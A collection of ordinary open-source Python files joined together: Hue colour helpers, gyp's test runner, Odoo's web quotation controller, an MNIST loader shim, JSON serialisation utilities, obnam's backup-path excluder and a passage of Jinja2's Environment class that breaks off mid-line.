represented by the supplied hexColor parameter, or of a random color if the parameter is not passed. The point of this function is to let people set a lamp's color to any random color. Arguably this should be implemented elsewhere.""" xy = [] if hexColor: xy = self.hexToCIE1931(hexColor) else: r = self.color.randomRGBValue() g = self.color.randomRGBValue() b = self.color.randomRGBValue() xy = self.rgbToCIE1931(r, g, b) return xy def CIE1931ToHex(self, x, y, bri=1): """Converts CIE 1931 x and y coordinates and brightness value from 0 to 1 to a CSS hex color.""" r, g, b = self.color.getRGBFromXYAndBrightness(x, y, bri) return self.color.rgbToHex(r, g, b)
mit
carlTLR/gyp
test/small/gyptest-small.py
205
1477
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Runs small tests. """ import imp import os import sys import unittest import TestGyp test = TestGyp.TestGyp() # Add pylib to the import path (so tests can import their dependencies). # This is consistant with the path.append done in the top file "gyp". sys.path.append(os.path.join(test._cwd, 'pylib')) # Add new test suites here. files_to_test = [ 'pylib/gyp/MSVSSettings_test.py', 'pylib/gyp/easy_xml_test.py', 'pylib/gyp/generator/msvs_test.py', 'pylib/gyp/generator/ninja_test.py', 'pylib/gyp/generator/xcode_test.py', 'pylib/gyp/common_test.py', 'pylib/gyp/input_test.py', ] # Collect all the suites from the above files. suites = [] for filename in files_to_test: # Carve the module name out of the path. name = os.path.splitext(os.path.split(filename)[1])[0] # Find the complete module path. full_filename = os.path.join(test._cwd, filename) # Load the module. module = imp.load_source(name, full_filename) # Add it to the list of test suites. suites.append(unittest.defaultTestLoader.loadTestsFromModule(module)) # Create combined suite. all_tests = unittest.TestSuite(suites) # Run all the tests. result = unittest.TextTestRunner(verbosity=2).run(all_tests) if result.failures or result.errors: test.fail_test() test.pass_test()
bsd-3-clause
BT-fgarbely/odoo
addons/website_quote/controllers/main.py
83
8996
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp import SUPERUSER_ID from openerp.addons.web import http from openerp.addons.web.http import request import werkzeug import datetime import time from openerp.tools.translate import _ class sale_quote(http.Controller): @http.route([ "/quote/<int:order_id>", "/quote/<int:order_id>/<token>" ], type='http', auth="public", website=True) def view(self, order_id, token=None, message=False, **post): # use SUPERUSER_ID allow to access/view order for public user # only if he knows the private token order = request.registry.get('sale.order').browse(request.cr, token and SUPERUSER_ID or request.uid, order_id, request.context) now = time.strftime('%Y-%m-%d') if token: if token != order.access_token: return request.website.render('website.404') # Log only once a day if request.session.get('view_quote',False)!=now: request.session['view_quote'] = now body=_('Quotation viewed by customer') self.__message_post(body, order_id, type='comment') days = 0 if order.validity_date: days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1 values = { 'quotation': order, 'message': message and int(message) or False, 'option': bool(filter(lambda x: not x.line_id, order.options)), 'order_valid': (not order.validity_date) or (now <= order.validity_date), 'days_valid': days, } return request.website.render('website_quote.so_quotation', values) @http.route(['/quote/accept'], type='json', auth="public", website=True) def accept(self, order_id, token=None, signer=None, sign=None, **post): order_obj = request.registry.get('sale.order') order = order_obj.browse(request.cr, SUPERUSER_ID, order_id) if token != order.access_token: return request.website.render('website.404') attachments=sign and [('signature.png', sign.decode('base64'))] or [] order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'order_confirm', context=request.context) message = _('Order signed by %s') % (signer,) self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments) return True @http.route(['/quote/<int:order_id>/<token>/decline'], type='http', auth="public", website=True) def decline(self, order_id, token, **post): order_obj = request.registry.get('sale.order') order = order_obj.browse(request.cr, SUPERUSER_ID, order_id) if token != order.access_token: return request.website.render('website.404') request.registry.get('sale.order').action_cancel(request.cr, SUPERUSER_ID, [order_id]) message = post.get('decline_message') if message: self.__message_post(message, order_id, type='comment', subtype='mt_comment') return werkzeug.utils.redirect("/quote/%s/%s?message=2" % (order_id, token)) @http.route(['/quote/<int:order_id>/<token>/post'], type='http', auth="public", website=True) def post(self, order_id, token, **post): # use SUPERUSER_ID allow to access/view order for public user order_obj = request.registry.get('sale.order') order = order_obj.browse(request.cr, SUPERUSER_ID, order_id) message = post.get('comment') if token != order.access_token: return request.website.render('website.404') if message: self.__message_post(message, order_id, type='comment', subtype='mt_comment') return werkzeug.utils.redirect("/quote/%s/%s?message=1" % (order_id, token)) def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]): request.session.body = message cr, uid, context = request.cr, request.uid, request.context user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context) if 'body' in request.session and request.session.body: request.registry.get('sale.order').message_post(cr, SUPERUSER_ID, order_id, body=request.session.body, type=type, subtype=subtype, author_id=user.partner_id.id, context=context, attachments=attachments ) request.session.body = False return True @http.route(['/quote/update_line'], type='json', auth="public", website=True) def update(self, line_id, remove=False, unlink=False, order_id=None, token=None, **post): order = request.registry.get('sale.order').browse(request.cr, SUPERUSER_ID, int(order_id)) if token != order.access_token: return request.website.render('website.404') if order.state not in ('draft','sent'): return False line_id=int(line_id) if unlink: request.registry.get('sale.order.line').unlink(request.cr, SUPERUSER_ID, [line_id], context=request.context) return False number=(remove and -1 or 1) order_line_obj = request.registry.get('sale.order.line') order_line_val = order_line_obj.read(request.cr, SUPERUSER_ID, [line_id], [], context=request.context)[0] quantity = order_line_val['product_uom_qty'] + number order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], {'product_uom_qty': (quantity)}, context=request.context) return [str(quantity), str(order.amount_total)] @http.route(["/quote/template/<model('sale.quote.template'):quote>"], type='http', auth="user", website=True) def template_view(self, quote, **post): values = { 'template': quote } return request.website.render('website_quote.so_template', values) @http.route(["/quote/add_line/<int:option_id>/<int:order_id>/<token>"], type='http', auth="public", website=True) def add(self, option_id, order_id, token, **post): vals = {} order = request.registry.get('sale.order').browse(request.cr, SUPERUSER_ID, order_id) if token != order.access_token: return request.website.render('website.404') if order.state not in ['draft', 'sent']: return request.website.render('website.http_error', {'status_code': 'Forbidden', 'status_message': _('You cannot add options to a confirmed order.')}) option_obj = request.registry.get('sale.order.option') option = option_obj.browse(request.cr, SUPERUSER_ID, option_id) res = request.registry.get('sale.order.line').product_id_change(request.cr, SUPERUSER_ID, order_id, False, option.product_id.id, option.quantity, option.uom_id.id, option.quantity, option.uom_id.id, option.name, order.partner_id.id, False, True, time.strftime('%Y-%m-%d'), False, order.fiscal_position.id, True, dict(request.context or {}, company_id=order.company_id.id)) vals = res.get('value', {}) if 'tax_id' in vals: vals['tax_id'] = [(6, 0, vals['tax_id'])] vals.update({ 'price_unit': option.price_unit, 'website_description': option.website_description, 'name': option.name, 'order_id': order.id, 'product_id' : option.product_id.id, 'product_uos_qty': option.quantity, 'product_uos': option.uom_id.id, 'product_uom_qty': option.quantity, 'product_uom': option.uom_id.id, 'discount': option.discount, }) line = request.registry.get('sale.order.line').create(request.cr, SUPERUSER_ID, vals, context=request.context) option_obj.write(request.cr, SUPERUSER_ID, [option.id], {'line_id': line}, context=request.context) return werkzeug.utils.redirect("/quote/%s/%s#pricing" % (order.id, token))
agpl-3.0
marmarko/ml101
tensorflow/examples/tutorials/mnist/input_data.py
165
1107
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functions for downloading and reading MNIST data.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import gzip import os import tempfile import numpy from six.moves import urllib from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
bsd-2-clause
darcamo/pyphysim
pyphysim/util/serialize.py
1
5985
#!/usr/bin/env python """ Module containing function related to serialization. """ import json from typing import Any, Dict, Union, cast import numpy as np Serializable = Union[np.ndarray, np.int32, np.int64, np.float32, np.float64, np.float128, set] # A type corresponding to the JSON representation of the object. For a lack of # a better option we use Any JsonRepresentation = Any class NumpyOrSetEncoder(json.JSONEncoder): """ JSON encoder for numpy arrays. Pass this class to json.dumps when converting a dictionary to json so that any field which with a numpy array as value will be properly converted. This encoder will also handle numpy scalars and the native python set types. When you need to convert the json representation back, use the `json_numpy_or_set_obj_hook` function. See Also -------- json_numpy_or_set_obj_hook """ def default(self, obj: Serializable) -> JsonRepresentation: """ If input object is an ndarray it will be converted into a dict holding data, dtype, _is_numpy_array and shape. Parameters ---------- obj : Serializable Returns ------- Serialized Data """ # Case for numpy arrays if isinstance(obj, np.ndarray): return { 'data': obj.tolist(), 'dtype': str(obj.dtype), '_is_numpy_array': True, 'shape': obj.shape } # Case for numpy scalars if isinstance(obj, (np.int32, np.int64)): return int(obj) if isinstance(obj, (np.float32, np.float64, np.float128)): return int(obj) # Case for built-in Python sets if isinstance(obj, set): return {'data': list(obj), '_is_set': True} # If it is not a numpy array we fall back to base class encoder return json.JSONEncoder(self, obj) # type: ignore def json_numpy_or_set_obj_hook( dct: Dict[str, JsonRepresentation]) -> Serializable: """ Decodes a previously encoded numpy array. Parameters ---------- dct : dict The JSON encoded numpy array. Returns ------- np.ndarray | set | dict, optional The decoded numpy array or None if the encoded json data was not an encoded numpy array. See Also -------- NumpyOrSetEncoder """ if isinstance(dct, dict) and '_is_numpy_array' in dct: if dct['_is_numpy_array'] is True: data = dct['data'] return np.array(data) raise ValueError( # pragma: no cover 'Json representation contains the "_is_numpy_array" key ' 'indicating that the object should be a numpy array, but it ' 'was set to False, which is not valid.') if isinstance(dct, dict) and '_is_set' in dct: if dct['_is_set'] is True: data = dct['data'] return set(data) raise ValueError( # pragma: no cover 'Json representation contains the "_is_set" key ' 'indicating that the object should be python set, but it ' 'was set to False, which is not valid.') return dct class JsonSerializable: """ Base class for classes you want to be JSON serializable (convert to/from JSON). You can call the methods `to_json` and `from_json` methods (the later is a staticmethod). Note that a subclass must implement the `_to_dict` and `_from_dict` methods. """ def _to_dict(self) -> Any: """ Convert the object to a dictionary representation. Returns ------- dict The dictionary representation of the object. """ raise NotImplementedError( "Implement in a subclass") # pragma: no cover def to_dict(self) -> Dict[str, Any]: """ Convert the object to a dictionary representation. Returns ------- dict The dictionary representation of the object. """ return cast(Dict[str, Any], self._to_dict()) @staticmethod def _from_dict(d: Any) -> Any: """ Convert from a dictionary to an object. Parameters ---------- d : dict The dictionary representing the object. Returns ------- Result The converted object. """ raise NotImplementedError( "Implement in a subclass") # pragma: no cover @classmethod def from_dict(cls, d: Dict[str, Any]) -> Any: """ Convert from a dictionary to an object. Parameters ---------- d : dict The dictionary representing the Result. Returns ------- Result The converted object. """ return cls._from_dict(d) def to_json(self) -> JsonRepresentation: """ Convert the object to JSON. Returns ------- str JSON representation of the object. """ return json.dumps(self._to_dict(), cls=NumpyOrSetEncoder) @classmethod def from_json(cls, data: JsonRepresentation) -> Any: """ Convert a JSON representation of the object to an actual object. Parameters ---------- data : str The JSON representation of the object. Returns ------- any The actual object """ d = json.loads(data, object_hook=json_numpy_or_set_obj_hook) return cls._from_dict(d) # # xxxxxxxxxx Test and Example Usage xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # if __name__ == '__main__': # expected = np.arange(100, dtype=np.float) # dumped = json.dumps(expected, cls=NumpyOrSetEncoder) # result = json.loads(dumped, object_hook=json_numpy_or_set_obj_hook) # print(type(result)) # print(result)
gpl-2.0
kishikawakatsumi/Mozc-for-iOS
src/dictionary/__init__.py
1
1582
# -*- coding: utf-8 -*- # Copyright 2010-2014, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. __author__ = "hidehiko"
apache-2.0
obnam-mirror/obnam
obnamlib/pathname_excluder.py
5
1610
# Copyright (C) 2015 Lars Wirzenius # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import re class PathnameExcluder(object): '''Decide which pathnames to exclude from a backup. ''' def __init__(self): self._exclude_patterns = [] self._include_patterns = [] def exclude_regexp(self, regexp): self._exclude_patterns.append((regexp, re.compile(regexp))) def allow_regexp(self, regexp): self._include_patterns.append((regexp, re.compile(regexp))) def exclude(self, pathname): included_regexp = self._match(pathname, self._include_patterns) if included_regexp: return False, included_regexp excluded_regexp = self._match(pathname, self._exclude_patterns) if excluded_regexp: return True, excluded_regexp return False, None def _match(self, pathname, patterns): for regexp, pattern in patterns: if pattern.search(pathname): return regexp return None
gpl-3.0
danakj/chromium
third_party/jinja2/environment.py
614
47244
# -*- coding: utf-8 -*- """ jinja2.environment ~~~~~~~~~~~~~~~~~~ Provides a class that holds runtime and parsing time options. :copyright: (c) 2010 by the Jinja Team. :license: BSD, see LICENSE for more details. """ import os import sys from jinja2 import nodes from jinja2.defaults import BLOCK_START_STRING, \ BLOCK_END_STRING, VARIABLE_START_STRING, VARIABLE_END_STRING, \ COMMENT_START_STRING, COMMENT_END_STRING, LINE_STATEMENT_PREFIX, \ LINE_COMMENT_PREFIX, TRIM_BLOCKS, NEWLINE_SEQUENCE, \ DEFAULT_FILTERS, DEFAULT_TESTS, DEFAULT_NAMESPACE, \ KEEP_TRAILING_NEWLINE, LSTRIP_BLOCKS from jinja2.lexer import get_lexer, TokenStream from jinja2.parser import Parser from jinja2.nodes import EvalContext from jinja2.optimizer import optimize from jinja2.compiler import generate from jinja2.runtime import Undefined, new_context from jinja2.exceptions import TemplateSyntaxError, TemplateNotFound, \ TemplatesNotFound, TemplateRuntimeError from jinja2.utils import import_string, LRUCache, Markup, missing, \ concat, consume, internalcode from jinja2._compat import imap, ifilter, string_types, iteritems, \ text_type, reraise, implements_iterator, implements_to_string, \ get_next, encode_filename, PY2, PYPY from functools import reduce # for direct template usage we have up to ten living environments _spontaneous_environments = LRUCache(10) # the function to create jinja traceback objects. This is dynamically # imported on the first exception in the exception handler. _make_traceback = None def get_spontaneous_environment(*args): """Return a new spontaneous environment. A spontaneous environment is an unnamed and unaccessible (in theory) environment that is used for templates generated from a string and not from the file system. """ try: env = _spontaneous_environments.get(args) except TypeError: return Environment(*args) if env is not None: return env _spontaneous_environments[args] = env = Environment(*args) env.shared = True return env def create_cache(size): """Return the cache class for the given size.""" if size == 0: return None if size < 0: return {} return LRUCache(size) def copy_cache(cache): """Create an empty copy of the given cache.""" if cache is None: return None elif type(cache) is dict: return {} return LRUCache(cache.capacity) def load_extensions(environment, extensions): """Load the extensions from the list and bind it to the environment. Returns a dict of instantiated environments. """ result = {} for extension in extensions: if isinstance(extension, string_types): extension = import_string(extension) result[extension.identifier] = extension(environment) return result def _environment_sanity_check(environment): """Perform a sanity check on the environment.""" assert issubclass(environment.undefined, Undefined), 'undefined must ' \ 'be a subclass of undefined because filters depend on it.' assert environment.block_start_string != \ environment.variable_start_string != \ environment.comment_start_string, 'block, variable and comment ' \ 'start strings must be different' assert environment.newline_sequence in ('\r', '\r\n', '\n'), \ 'newline_sequence set to unknown line ending string.' return environment class Environment(object): r"""The core component of Jinja is the `Environment`. It contains important shared variables like configuration, filters, tests, globals and others. Instances of this class may be modified if they are not shared and if no template was loaded so far. Modifications on environments after the first template was loaded will lead to surprising effects and undefined behavior. Here the possible initialization parameters: `block_start_string` The string marking the begin of a block. Defaults to ``'{%'``. `block_end_string` The string marking the end of a block. Defaults to ``'%}'``. `variable_start_string` The string marking the begin of a print statement. Defaults to ``'{{'``. `variable_end_string` The string marking the end of a print statement. Defaults to ``'}}'``. `comment_start_string` The string marking the begin of a comment. Defaults to ``'{#'``. `comment_end_string` The string marking the end of a comment. Defaults to ``'#}'``. `line_statement_prefix` If given and a string, this will be used as prefix for line based statements. See also :ref:`line-statements`. `line_comment_prefix` If given and a string, this will be used as prefix for line based based comments. See also :ref:`line-statements`. .. versionadded:: 2.2 `trim_blocks` If this is set to ``True`` the first newline after a block is removed (block, not variable tag!). Defaults to `False`. `lstrip_blocks` If this is set to ``True`` leading spaces and tabs are stripped from the start of a line to a block. Defaults to `False`. `newline_sequence` The sequence that starts a newline. Must be one of ``'\r'``, ``'\n'`` or ``'\r\n'``. The default is ``'\n'`` which is a useful default for Linux and OS X systems as well as web applications. `keep_trailing_newline` Preserve the trailing newline when rendering templates. The default is ``False``, which causes a single newline, if present, to be stripped from the end of the template. .. versionadded:: 2.7 `extensions` List of Jinja extensions to use. This can either be import paths as strings or extension classes. For more information have a look at :ref:`the extensions documentation <jinja-extensions>`. `optimized` should the optimizer be enabled? Default is `True`. `undefined` :class:`Undefined` or a subclass of it that is used to represent undefined values in the template. `finalize` A callable that can be used to process the result of a variable expression before it is output. For example one can convert `None` implicitly into an empty string here. `autoescape` If set to true the XML/HTML autoescaping feature is enabled by default. For more details about auto escaping see :class:`~jinja2.utils.Markup`. As of Jinja 2.4 this can also be a callable that is passed the template name and has to return `True` or `False` depending on autoescape should be enabled by default. .. versionchanged:: 2.4 `autoescape` can now be a function `loader` The template loader for this environment. `cache_size` The size of the cache. Per default this is ``50`` which means that if more than 50 templates are loaded the loader will clean out the least recently used template. If the cache size is set to ``0`` templates are recompiled all the time, if the cache size is ``-1`` the cache will not be cleaned. `auto_reload` Some loaders load templates from locations where the template sources may change (ie: file system or database). If `auto_reload` is set to `True` (default) every time a template is requested the loader checks if the source changed and if yes, it will reload the template. For higher performance it's possible to disable that. `bytecode_cache` If set to a bytecode cache object, this object will provide a cache for the internal Jinja bytecode so that templates don't have to be parsed if they were not changed. See :ref:`bytecode-cache` for more information. """ #: if this environment is sandboxed. Modifying this variable won't make #: the environment sandboxed though. For a real sandboxed environment #: have a look at jinja2.sandbox. This flag alone controls the code #: generation by the compiler. sandboxed = False #: True if the environment is just an overlay overlayed = False #: the environment this environment is linked to if it is an overlay linked_to = None #: shared environments have this set to `True`. A shared environment #: must not be modified shared = False #: these are currently EXPERIMENTAL undocumented features. exception_handler = None exception_formatter = None def __init__(self, block_start_string=BLOCK_START_STRING, block_end_string=BLOCK_END_STRING, variable_start_string=VARIABLE_START_STRING, variable_end_string=VARIABLE_END_STRING, comment_start_string=COMMENT_START_STRING, comment_end_string=COMMENT_END_STRING, line_statement_prefix=LINE_STATEMENT_PREFIX, line_comment_prefix=LINE_COMMENT_PREFIX, trim_blocks=TRIM_BLOCKS, lstrip_blocks=LSTRIP_BLOCKS, newline_sequence=NEWLINE_SEQUENCE, keep_trailing_newline=KEEP_TRAILING_NEWLINE, extensions=(), optimized=True, undefined=Undefined, finalize=None, autoescape=False, loader=None, cache_size=50, auto_reload=True, bytecode_cache=None): # !!Important notice!! # The constructor accepts quite a few arguments that should be # passed by keyword rather than position. However it's important to # not change the order of arguments because it's used at least # internally in those cases: # - spontaneous environments (i18n extension and Template) # - unittests # If parameter changes are required only add parameters at the end # and don't change the arguments (or the defaults!) of the arguments # existing already. # lexer / parser information self.block_start_string = block_start_string self.block_end_string = block_end_string self.variable_start_string = variable_start_string self.variable_end_string = variable_end_string self.comment_start_string = comment_start_string self.comment_end_string = comment_end_string self.line_statement_prefix = line_statement_prefix self.line_comment_prefix = line_comment_prefix self.trim_blocks = trim_blocks self.lstrip_blocks = lstrip_blocks self.newline_sequence = newline_sequence self.keep_trailing_newline = keep_trailing_newline # runtime information self.undefined = undefined self.optimized = optimized self.finalize = finalize self.autoescape = autoescape # defaults self.filters = DEFAULT_FILTERS.copy() self.tests = DEFAULT_TESTS.copy() self.globals = DEFAULT_NAMESPACE.copy() # set the loader provided self.loader = loader self.cache = create_cache(cache_size) self.bytecode_cache = bytecode_cache self.auto_reload = auto_reload # load extensions self.extensions = load_extensions(self, extensions) _environment_sanity_check(self) def add_extension(self, extension): """Adds an extension after the environment was created. .. versionadded:: 2.5 """ self.extensions.update(load_extensions(self, [extension])) def extend(self, **attributes): """Add the items to the instance of the environment if they do not exist yet. This is used by :ref:`extensions <writing-extensions>` to register callbacks and configuration values without breaking inheritance. """ for key, value in iteritems(attributes): if not hasattr(self, key): setattr(self, key, value) def overlay(self, block_start_string=missing, block_end_string=missing, variable_start_string=missing, variable_end_string=missing, comment_start_string=missing, comment_end_string=missing, line_statement_prefix=missing, line_comment_prefix=missing, trim_blocks=missing, lstrip_blocks=missing, extensions=missing, optimized=missing, undefined=missing, finalize=missing, autoescape=missing, loader=missing, cache_size=missing, auto_reload=missing, bytecode_cache=missing): """Create a new overlay environment that shares all the data with the current environment except of cache and the overridden attributes. Extensions cannot be removed for an overlayed environment. An overlayed environment automatically gets all the extensions of the environment it is linked to plus optional extra extensions. Creating overlays should happen after the initial environment was set up completely. Not all attributes are truly linked, some are just copied over so modifications on the original environment may not shine through. """ args = dict(locals()) del args['self'], args['cache_size'], args['extensions'] rv = object.__new__(self.__class__) rv.__dict__.update(self.__dict__) rv.overlayed = True rv.linked_to = self for key, value in iteritems(args): if value is not missing: setattr(rv, key, value) if cache_size is not missing: rv.cache = create_cache(cache_size) else: rv.cache = copy_cache(self.cache) rv.extensions = {} for key, value in iteritems(self.extensions): rv.extensions[key] = value.bind(rv) if extensions is not missing: rv.extensions.update(load_extensions(rv, extensions)) return _environment_sanity_check(rv) lexer = property(get_lexer, doc="The lexer for this environment.") def iter_extensions(self): """Iterates over the extensions by priority.""" return iter(sorted(self.extensions.values(), key=lambda x: x.priority)) def getitem(self, obj, argument): """Get an item or attribute of an object but prefer the item.""" try: return obj[argument] except (TypeError, LookupError): if isinstance(argument, string_types): try: attr = str(argument) except Exception: pass else: try: return getattr(obj, attr) except AttributeError: pass return self.undefined(obj=obj, name=argument) def getattr(self, obj, attribute): """Get an item or attribute of an object but prefer the attribute. Unlike :meth:`getitem` the attribute *must* be a bytestring. """ try: return getattr(obj, attribute) except AttributeError: pass try: return obj[attribute] except (TypeError, LookupError, AttributeError): return self.undefined(obj=obj, name=attribute) def call_filter(self, name, value, args=None, kwargs=None, context=None, eval_ctx=None): """Invokes a filter on a value the same way the compiler does it. .. versionadded:: 2.7 """ func = self.filters.get(name) if func is None: raise TemplateRuntimeError('no filter named %r' % name) args = [value] + list(args or ()) if getattr(func, 'contextfilter', False): if context is None: raise TemplateRuntimeError('Attempted to invoke context ' 'filter without context') args.insert(0, context) elif getattr(func, 'evalcontextfilter', False): if eval_ctx is None: if context is not None: eval_ctx = context.eval_ctx else: eval_ctx = EvalContext(self) args.insert(0, eval_ctx) elif getattr(func, 'environmentfilter', False): args.insert(0, self) return func(*args, **(kwargs or {})) def call_test(self, name, value, args=None, kwargs=None): """Invokes a test on a value the same way the compiler does it. .. versionadded:: 2.7 """ func = self.tests.get(name) if func is None: raise TemplateRuntimeError('no test named %r' % name) return func(value, *(args or ()), **(kwargs or {})) @internalcode def parse(self, source, name=None, filename=None): """Parse the sourcecode and return the abstract syntax tree. This tree of nodes is used by the compiler to convert the template into executable source- or bytecode. This is useful for debugging or to extract information from templates. If you are :ref:`developing Jinja2 extensions <writing-extensions>` this gives you a good overview of the node tree generated. """ try: return self._parse(source, name, filename) except TemplateSyntaxError: exc_info = sys.exc_info() self.handle_exception(exc_info, source_hint=source) def _parse(self, source, name, filename): """Internal parsing function used by `parse` and `compile`.""" return Parser(self, source, name, encode_filename(filename)).parse() def lex(self, source, name=None, filename=None): """Lex the given sourcecode and return a generator that yields tokens as tuples in the form ``(lineno, token_type, value)``. This can be useful for :ref:`extension development <writing-extensions>` and debugging templates. This does not perform preprocessing. If you want the preprocessing of the extensions to be applied you have to filter source through the :meth:`preprocess` method. """ source = text_type(source) try: return self.lexer.tokeniter(source, name, filename) except TemplateSyntaxError: exc_info = sys.exc_info() self.handle_exception(exc_info, source_hint=source) def preprocess(self, source, name=None, filename=None): """Preprocesses the source with all extensions. This is automatically called for all parsing and compiling methods but *not* for :meth:`lex` because there you usually only want the actual source tokenized. """ return reduce(lambda s, e: e.preprocess(s, name, filename), self.iter_extensions(), text_type(source)) def _tokenize(self, source, name, filename=None, state=None): """Called by the parser to do the preprocessing and filtering for all the extensions. Returns a :class:`~jinja2.lexer.TokenStream`. """ source = self.preprocess(source, name, filename) stream = self.lexer.tokenize(source, name, filename, state) for ext in self.iter_extensions(): stream = ext.filter_stream(stream) if not isinstance(stream, TokenStream): stream = TokenStream(stream, name, filename) return stream def _generate(self, source, name, filename, defer_init=False): """Internal hook that can be overridden to hook a different generate method in. .. versionadded:: 2.5 """ return generate(source, self, name, filename, defer_init=defer_init) def _compile(self, source, filename): """Internal hook that can be overridden to hook a different compile method in. .. versionadded:: 2.5 """ return compile(source, filename, 'exec') @internalcode def compile(self, source, name=None, filename=None, raw=False, defer_init=False): """Compile a node or template source code. The `name` parameter is the load name of the template after it was joined using :meth:`join_path` if necessary, not the filename on the file system. the `filename` parameter is the estimated filename of the template on the file system. If the template came from a database or memory this can be omitted. The return value of this method is a python code object. If the `raw` parameter is `True` the return value will be a string with python code equivalent to the bytecode returned otherwise. This method is mainly used internally. `defer_init` is use internally to aid the module code generator. This causes the generated code to be able to import without the global environment variable to be set. .. versionadded:: 2.4 `defer_init` parameter added. """ source_hint = None try: if isinstance(source, string_types): source_hint = source source = self._parse(source, name, filename) if self.optimized: source = optimize(source, self) source = self._generate(source, name, filename, defer_init=defer_init) if raw: return source if filename is None: filename = '<template>' else: filename = encode_filename(filename) return self._compile(source, filename) except TemplateSyntaxError: exc_info = sys.exc_info() self.handle_exception(exc_info, source_hint=source) def compile_expression(self, source, undefined_to_none=True): """A handy helper method that returns a callable that accepts keyword arguments that appear as variables in the expression. If called it returns the result of the expression. This is useful if applications want to use the same rules as Jinja in template "configuration files" or similar situations. Example usage: >>> env = Environment() >>> expr = env.compile_expression('foo == 42') >>> expr(foo=23) False >>> expr(foo=42) True Per default the return value is converted to `None` if the expression returns an undefined value. This can be changed by setting `undefined_to_none` to `False`. >>> env.compile_expression('var')() is None True >>> env.compile_expression('var', undefined_to_none=False)() Undefined .. versionadded:: 2.1 """ parser = Parser(self, source, state='variable') exc_info = None try: expr = parser.parse_expression() if not parser.stream.eos: raise TemplateSyntaxError('chunk after expression', parser.stream.current.lineno, None, None) expr.set_environment(self) except TemplateSyntaxError: exc_info = sys.exc_info() if exc_info is not None: self.handle_exception(exc_info, source_hint=source) body = [nodes.Assign(nodes.Name('result', 'store'), expr, lineno=1)] template = self.from_string(nodes.Template(body, lineno=1)) return TemplateExpression(template, undefined_to_none) def compile_templates(self, target, extensions=None, filter_func=None, zip='deflated', log_function=None, ignore_errors=True, py_compile=False): """Finds all the templates the loader can find, compiles them and stores them in `target`. If `zip` is `None`, instead of in a zipfile, the templates will be will be stored in a directory. By default a deflate zip algorithm is used, to switch to the stored algorithm, `zip` can be set to ``'stored'``. `extensions` and `filter_func` are passed to :meth:`list_templates`. Each template returned will be compiled to the target folder or zipfile. By default template compilation errors are ignored. In case a log function is provided, errors are logged. If you want template syntax errors to abort the compilation you can set `ignore_errors` to `False` and you will get an exception on syntax errors. If `py_compile` is set to `True` .pyc files will be written to the target instead of standard .py files. This flag does not do anything on pypy and Python 3 where pyc files are not picked up by itself and don't give much benefit. .. versionadded:: 2.4 """ from jinja2.loaders import ModuleLoader if log_function is None: log_function = lambda x: None if py_compile: if not PY2 or PYPY: from warnings import warn warn(Warning('py_compile has no effect on pypy or Python 3')) py_compile = False else: import imp, marshal py_header = imp.get_magic() + \ u'\xff\xff\xff\xff'.encode('iso-8859-15') # Python 3.3 added a source filesize to the header if sys.version_info >= (3, 3): py_header += 